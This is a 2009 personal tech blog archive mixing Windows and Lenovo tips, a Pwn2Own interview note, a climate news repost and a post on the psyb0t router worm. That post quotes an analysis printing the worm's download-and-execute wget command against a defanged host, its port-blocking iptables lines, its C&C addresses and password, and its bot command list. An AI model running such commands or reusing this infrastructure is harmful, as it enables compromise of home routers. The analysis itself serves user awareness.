Search This Blog

Monday, March 30, 2009

Conflicker - April Fools on who?

Well, everyone is talking about it. And it seems something BIG will happen on April 1st. I doubt it, but with the population of 1 million, you never know.

BTW, at least you should try to visit sites such as www.f-secure.com or www.symantec.com. If it does not work, you may be infected or has done something serious to your hosts file. 

Here is a good FAQ on the Conflicker worm :


Friday, March 27, 2009

psyb0t - Am I vulnerable?

Just got some info that you will be vulnerable to this worm if:
  • Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device.
  • Your device also has telnet, SSH or web-based interfaces available to the WAN, and
  • Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.
For point 1, its not hard, psyb0t v2 can probably fix that. So do not count on it you are SAFE if you do not satisfy point 1.

Also, it was suggested that if you find port 80, 23 and 22 are blocked, you should suspect something is going on. Well, unless your ISP usually already blocked them, then it's a bit hard to confirm. Come on? Which ISP will block port 80?? :P

I copied the infection steps here for those who are more technical:

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process.

And more interesting, these are the ircbot and commands:

IRC Botnet

Command and control server: strcpy.us.to
IP: 207.155.1.5 (master controller, Windstream Communications AS16687)
IP: 202.67.218.33 (backup controller? HKnet/REACH AS?????)
Port: 5050
Password: $!0@
Channel: #mipsel
Key: %#8b
NickPattern: \[NIP\]-[A-Z/0-9]{9}
BotController: DRS
DroneURL: hxxp://nenolod.net/~nenolod/psyb0t/udhcpc.env (backup copy, i did not write it)

strcpy.us.to control domain nameservers: ns1.afraid.org, ns2.afraid.org, ns3.afraid.org, ns4.afraid.org [suspended]

IRC Commands

.mode   -setsamodeonachannel
.login -logintothebot
.logout -logout
.exit -causesthebotnettoexitandremoveitself
.sh -runsonshell
.tlist -listsallthreads
.kill -killsathread
.killall -killsthreads by glob-match pattern
.silent -makesthebotstopsendingtochannel
.getip -showbotWANipaddress
.visit -floodURLwithGETrequests
.scan -scansarandomrangeforvulnerablerouters/modems
.rscan -scansaCIDRrangeforvulnerablerouters/modems
.lscan -scansthelocalsubnetforvulnerablerouters/modems
.lrscan -scansarangeinthelocalsubnetforvulnerablerouters/modems
.split -splitstheworkloadofascanthreadintotwothreads
.sql -scansforvulnerableMySQLserversandattemptstomakethemdownloadandrunURL
.pma -scansforvulnerablephpMyAdminandattemptstomakethemdownloadandrunURL
.sleep -makesthebotsleepforthegiventime
.sel -???
.esel -skipnextpartiflocaleisnotX
.vsel -skipnextpartifversionisnotX
.gsel -???
.rejoin[delay] -cyclethechannelafterdelay
.upgrade -downloadnewbotfromthedistributionsite
.ver -returns"[PRIVATE]PSYB0T"followedbyversion
.rs -returnsdetectedrapidshareURLsandlogins
.rsgen -generateabogusrapidshareloginpageandforceusertobrowsetoit
.rsloop -runsawebserveri/olooponasathread
.wget -runswgetwiththeprovidedurl
.r00t -attemptstoraiseeffectiveUIDusingvmsplice()exploit(seemspointless)
.sflood -sendsSYNpacketstoIP
.uflood -sendsUDPpacketstoIP
.iflood -sendsICMPpingstoIP
.pscan -portscansIP
.fscan -triestobruteforceFTPserveratIP
More info at:
http://www.dronebl.org/blog/8

psyb0t Worm Hacking Home Router

What is psyb0t? Its the stealth botnet worm that has been in the wild hacking routers all over the world. Well, at least on planet Earth. Here are some of the "confirmed" characteristic of the worm :
  • is the first botnet worm to target routers and DSL modems
  • contains shellcode for many mipsel devices
  • is not targeting PCs or servers
  • uses multiple strategies for exploitation, including bruteforce username and password combinations
  • harvests usernames and passwords through deep packet inspection
  • can scan for exploitable phpMyAdmin and MySQL servers
It sound to me like the OpenWRT/DD-WRT is sitting duck for this. And among those, most of those that can be modded with these probably should take care about this worm. I heard even Tomato is affected.

While I do not have the sample of the worm now, all I can advise is:

Change the admin account to something else, like littleteddybear66.
Change the password (I hope you are not using the default!!!) to something strong. I would call 10 character, upper + lower + symbol + number strong.

Friday, March 20, 2009

Pwn2Own hacker interview

Some background. In the CanSecWest conference a few days back, a hacker Charlie Miller managed to bring into the OS X within a few seconds with an exploit working on Safari. ZDNet run a short interview with him at :

http://c.moreover.com/click/here.pl?r1877738091

The key points I wanted to post here is that he mentioned that Windows was much harder to bring, which I agree. However, that is true only in the case the software enforces the security measures. I probably have to agree on the point he said in Apple, you just do anything you want. Well, that is true as well. However, one point keep me in thoughts. That is NO MORE FREE BUG. Each bug found can be worth like USD$5000 or more, depending on the difficulty of the software. So I suppose I should not release my 0 day anymore since I will be like Santa Claus giving away $5k (or more) each time I do that. Haha, well it depends on how bad the bugs was and my level of good vs evil. In case of doubts, read my previous post on How Evil am I.

Enjoy reading the interview. And btw, IE8 went ahead with the official launch despite the 0 day bug present.

How Evil am I? Bawahahahahaha


How evil are you?

I guess its a fun quiz, just don't be offened, Canandian. Not every country IS a weapon.

Tuesday, March 17, 2009

Lenovo ThinkVantage System Update


I mentioned this piece of software in a previous post; and I believe this software deserved to be mentioned again in a single post. I must say that among all the software vendors which provides Laptop / PC I had seen such as Acer, HP, Dell, Gateway etc... None of them has such a tool like ThinkVantage System Update.

So what exactly is ThinkVantage System Update? Think of it as a Lenovo (previous IBM) Thinkpad Live Update system similar to Windows Updates or your Anti-Something Update. It will pick up the exact model of your laptop or PC and then find the updates that you may require. So, you won't end up picking the wrong drivers for something you do not have. This is quite common on other vendors especially if they distributes many model of bluetooth or DVD writers with the same range. You will have to dig pretty hard and remember those when you choose which driver to download. This, however, is not the case with Lenovo because of ThinkVantage Update.

This is the descriptions provided on Lenovo's page:
"System Update™ helps you reduce the time, effort, and expense required to support and maintain the latest drivers, BIOS, and other applications for Think or Lenovo systems. It enables you to get the latest updates from the Lenovo support site, or to automatically schedule your system to be updated."

I would love to repeat other stuff from that page, but I think its probably better you go take a look yourself if you are using a Lenovo system. However, I find the following information at least is useful to state here:

Supported systems
  • Lenovo 3000 C100, C200, N100, N200, V100, V200 notebook computers
  • Lenovo 3000 J100, J105, J110, J115, J200, J200p, J205, S200, S200p, S205 desktop computers
  • ThinkPad Reserve Edition
  • ThinkPad A30, A30p, A31, A31p
  • ThinkPad G40, G41, G50
  • ThinkPad R30, R31, R32, R40, R40e, R50, R50e, R50p, R51, R51e, R52, R60, R60e, R60i, R61, R61e, R61i
  • ThinkPad S31
  • ThinkPad T23, T30, T40, T40p, T41, T41p, T42, T42p, T43, T43p, T60, T60p, T61, T61p
  • ThinkPad X22, X23, X24, X30, X31, X32, X40, X41, X41 Tablet, X60, X60s, X60 Tablet, X61, X61s, X61 Tablet, X300
  • ThinkPad Z60m, Z60s, Z60t, Z61e, Z61m, Z61p, Z61t
  • ThinkPad SL300, SL400, SL500
  • ThinkPad T400, T500
  • All ThinkCentre desktop computers
  • All ThinkStation desktop computers

I find it strange that by default System Update is not installed on the thinkpad I get. Ok, there may also be a chance it was removed by "smart" administrators to prevent us from updating the laptops. But in any case, here is the link to read about and to download it:

Lastly, I think its fair to say I am supportive of this software and really wish other vendors has something like this. However, I am also state that I do not work for IBM or Lenovo and is no way associated with this software.

Monday, March 16, 2009

Lenovo Thinkpad Bluetooth with other devices

I was having a terribly hard time trying to send a file simply from my Omnia to my Thinkpad today. I deleted the pairing, repaired and did whatever it takes. It just doesn't work.

I had used ThinkAdvantage and apparently, there is no update to the bluetooth software at all. I checked the drivers. It say 2004. I wondered why.

After some checks, it turns out that the default Windows bluetooth drivers was used (2004 is when WinXP was released). So, I searched around online to try to grab hold of a copy of the driver. It turns out that this Broadcom bluetooth "Lenovo Bluetooth with Enhanced Data Rate" was the same as the Toshiba one. I concluded that from the installation program anyway. It looks exactly the same. But in any case, I found the site to check what is the latest version available form here:

And the driver I had gotten to install was the latest at 5.5.0.5800 at:

I hoped this information will be useful to people using the Thinkpad model of:
- ThinkPad R60(*1), R60e(*1), R61(*1), R61e(*1), R61i(*1)
- ThinkPad R400, R500
- ThinkPad SL300, SL400, SL500
- ThinkPad T60(*1), T60p(*1), T61(*1), T61p(*1)
- ThinkPad T400, T500
- ThinkPad W500, W700, W700ds
- ThinkPad X60(*1), X60s(*1), X60 Tablet(*1), X61(*1), X61s(*1), X61 Tablet(*1)
- ThinkPad X200, X200s, X200 Tablet, X300(*1), X301
- ThinkPad Z60m(*1), Z60t(*1)
- ThinkPad Z61e(*1), Z61m(*1), Z61p(*1), Z61t(*1)

 

Wednesday, March 11, 2009

Roboform and IE8

During the testing of Windows 7, I noticed that the password manager I was using worked perfectly. This is Roboform.

More information:
http://www.roboform.com/features.html

Honestly, there are simply too many password to remember these days and changing all of them to a few similar ones is highly not recommended either. Therefore the user of password manager is one of the way to go about keeping track of your thousands of passwords.

Roboform offer both free and pro mode. There is a limit to the number of password you can store in the free mode. However, once started, I find myself hard to pull away from this. In fact I rely so much of this for many of the complex passwords. Roboform also offers a runtime only portable version in U3, USB portable application, portableapps, Windows mobile etc. This makes the password database portable to my many devices. Oh, of course the password is stored encrypted as well.

Roboform has been tested working in both IE8 and Windows 7.

Sunday, March 08, 2009

Windows 7 RC Build 7048

There are already some torrent sites listing this leaked version of the RC of Windows 7. I am not sure how that will work, especially when it comes to the CD-Key management. However, do rest assure that there is indeed a Build 7048 RC which will be coming soon (although it was promised for late Feb 2009).

For the meantime, enjoy these 100 screen shots from Softpedia of the RC1 of Windows 7:
http://news.softpedia.com/news/Windows-7-Build-7048-100-Screenshots-Gallery-106289.shtml

Virtual Drive Software for Windows 7

I used to be a great fan of Alcohol 52% and Daemon Tool. However, I just realized that due to the SPTD driver (http://www.duplexsecure.com/downloads), it will not install properly in Windows 7. Well to be fair, it kinda installed. but Windows 7 could never detect it was installed. As a result, Alcohol 52% keep trying to install this and does not go on...

There may be another tool thats works, but I am going to recommend using Gizmo Drive for now:
http://arainia.com/software/gizmo/overview.php?nID=4

Gizmo Drive does something similar. It can make and mount images for more popular formats. Unfortunately, it does not has the copy protection features in Alcohol and Daemon Tool.

Until any of these can fix the Windows 7 problem, I guess we can use Gizmo Drive for now. Btw, its a freeware too.

Toshiba Memory Flash Drive Cannot enable Vista Readyboost

I am sorry I have to mention Toshiba. It can probably happen to any other brands, but so far I had only been able to see Toshiba ones which actually happened.

Before I go on, let's put this straight. If the packaging says its Vista Readyboost compatible, it should be. Otherwise, no matter what you do, it will probably not be. Notice I mentioned probably, because I had a red Sandisk flash drive which actually IS compatible, but is not advertised as such.

The only problem arises when you actually plug in the flash drive and found that Vista complain it does not meet the minimum requirement. Btw, I had mentioned before, the requirement is only 2MB/second.

I was very upset when I gotten the Toshiba drive and found that I was ripped off. The biggest problem was I bought the 4GB drive solely for the purpose of Readyboost. 4GB is the max you can go on Windows Vista, but do note that in the future in Windows 7, this limit has been removed. Next, when I attempted to RMA the item, Toshiba told me that it was from an "unauthorized" dealer and advise I go back to the shop I bought from, which turns out to be Playcraft. They are only located in the far west, which will probably cost me more than this flash drive to go.

So, I had to take the matter into my own hands. I was so frustrated I thought I might as well "destroy" the drive by overwriting it with zero or something similar using a DOS hard disk wiper tool. And that I did. There are many which you can use, I used Acronis in this case. What I did not was to create the partition back.

I booted back into my Windows Vista and it detected the unformatted drive. I simply create a "simple volume" and remount the drive with a drive letter. Suddenly and "automagically", Readyboost prompt pops up saying it is ready to be use with Readyboost.

Unbelivable? I think so too. And I really wondered what they did in the first place that made the drive NOT Readyboost compatible? Maybe I should had checked the drive before I did the HDD wipe on it... In any case, I hope this helps you out there solve similar problems.

Friday, March 06, 2009

Jeyo Mobile Extender and Windows 7 (Firewall)

Jeyo Mobile Extender allows you to sync and send SMS as if they are email using Outlook. In fact, its a good SMS backup tool as well for your PDA / Windows Mobile.

More info:
http://www.jeyo.com/extender.asp

However, there seems to be a problem detecting the mobile device in Windows 7. I did some check and eventually found out that it was due to a firewall issue in Windows 7. So, this probably only affect people who are using Windows 7 default firewall. However, if you do encounter such an issue, you can try this out on your 3rd party firewall as well.

Taken from:
http://www.everythingq.com/forum/software/jeyo-mobile-extender-windows-7-cannot-connect-30819.html

Overview:
Add an Inbound Rule in Windows Firewall for outlook.exe, protocol TCP and port 9035.

Details:
Open Control Panel
Open Windows Firewall
Click Advanced Settings
Select Inbound Rules

From the Menu, select New Rule
Rule Type -> Custom
Program -> %Program Files% (x86)\Microsoft Office\Office 12\OUTLOOK.EXE (or wherever your Outlook.exe is)
Protocol and Ports -> Protocol type: TCP, Local Port -> Specific Port: 9035
Scope: Which remote IP address does this rule apply to? These IP address -> Predefined set of computers -> Local subnet
Action: Allow the connection
Profile: Uncheck Domain and Public
Name: Jeyo Mobile Extender

Wednesday, March 04, 2009

Doomsday: How 4C temperature rise this century will change world beyond recognition and threaten human survival

Doomsday: How 4C temperature rise this century will change world beyond recognition and threaten human survival

By Claire Bates
Last updated at 3:21 PM on 26th February 2009


Alligators bask off the English coast, the Saharan desert stretches far into Europe and just 10 per cent of humans are left on the planet.

Science fiction?

No, this is the doomsday scenario being predicted by scientists if global temperatures make a predicted rise of 4C in the next 100 years. Some fear it could happen as early as 2050.

Rivers from the Danube to the Rhine would be reduced to a trickle while melting glaciers and storm surges would drown coastal regions under two metres of water. More if parts of Antarctica were to melt.


Trying to prevent desertification. Some experts predict that by 2100 deserts would take over most of Africa and stretch into Europe

While 4C does not sound like very much, the New Scientist magazine, has said it could easily occur.

A report in 2007 by the Intergovernmental Panel on Climate Change, whose conclusions are generally accepted as conservative, predicted a rise of between 2C and 6.4C this century.

In August of 2008 Bob Watson, former chair of the IPCC, warned that the world should prepare for 4C of warming.

As part of their research into the article the New Scientist spoke to leading climate experts from around the world to create a map of how our world might look 4C warmer.

Many were optimistic that humans would survive but would have to adapt to vastly altered circumstances. Vast numbers would have to migrate and there would have to be a world effort to redistribute resources.

As a huge swathe of desert started to spread out from the equator, humans would migrate north and south towards the poles, knocking down national boundaries.

'We need to look at the world afresh and see it in terms of where the resources are, and then plan population around that,' Peter Cox from the University of Exeter said.

Humans will become mostly vegetarian with most animals being eaten to extinction by desperate people.


A glaciers melt, sea levels are expected to rise by 2m this century

Large chunks of Earth's biodiversity would vanish because they could not adapt in such a short time.

In the world's oceans, numbers of fish would drop dramatically as acid levels rose because of decreasing plankton.

As the remaining fertile lands would be so precious people would have to live in compact high-rise cities to preserve space for food growing.

Scientists have put forward the prospect of energy being supplied for homes by a giant solar belt running across North Africa, the Middle East and the southern U.S. The New Scientist article also questioned the future of the humankind.

'I think they'll survive as a species all right, but the cull during this century is going to be huge,' former Nasa scientists James Lovelock said.

'The number remaining at the end of the century will probably be a billion or less.'


Workers install solar panels in France. Massive solar panel complexes stretching across countries could be built to provide for the world's energy needs

The last time the world experienced such temperature rises was 55 million years ago when large areas of frozen methane were released from the ocean and filled the atmosphere with carbon, warming the planet by 6C.

Unfortunately humans did not learn any survival lessons from the event as we only evolved a quarter of a million years ago.

Many experts hope our species will continue but warn we are not doing enough to try and prevent a catastrophe.

'In order to be safe, we would have to reduce our carbon emissions by 70 per cent by 2015. We are currently putting in 3 per cent more each year,' said Nobel prizewinning chemist Paul Crutzen.

Source :
http://www.dailymail.co.uk/sciencetech/article-1156023/Doomsday-How-4C-temperature-rise-century-change-world-recognition-threaten-human-survival.html

Monday, March 02, 2009

A moment of Zen

I am not sure if you had ever encounter something like this...

It was a warm and windy afternoon. Well, it's windy because I am stuck somewhere in the forest nearby the sea water. I was so tired (from the waiting), that I simply lie down on the dirt track. Well, its at the point that you do not really care anymore because you are so tired.

Above me, I see some leaves, green and yellow. The sunlight shone through, and the breeze from the sea water makes the leaves dance in the wind. Its moment like this that does not come often. All around me I can heard the leaves hisses and some bugs humming... Its that type of lazy afternoon basically.

All a sudden, I felt this moment of, well, Zen maybe. I feel nothing matters. I forgets everything around me. It was as if I am now one with the heaven and earth. Inside, I feel tranquil and peace. It was like time just freezes.

But time did passes and all that I am sure I was not asleep or anything. Suddenly, I feel a groan from my stomach. :) Its lunch time. Well, I had to go and collect the food for the guys....

Its not that often you get to be with natural in this way. Without boundary or restriction. Just lying there and feel yourself submerged into natural itself. Well, try it someday and see if you can feel this wonderful moment of Zen...

Amazon Gift Cards!

Thanks for viewing!

Copyright © 2008 nemesisv.blogspot.com, All rights reserved.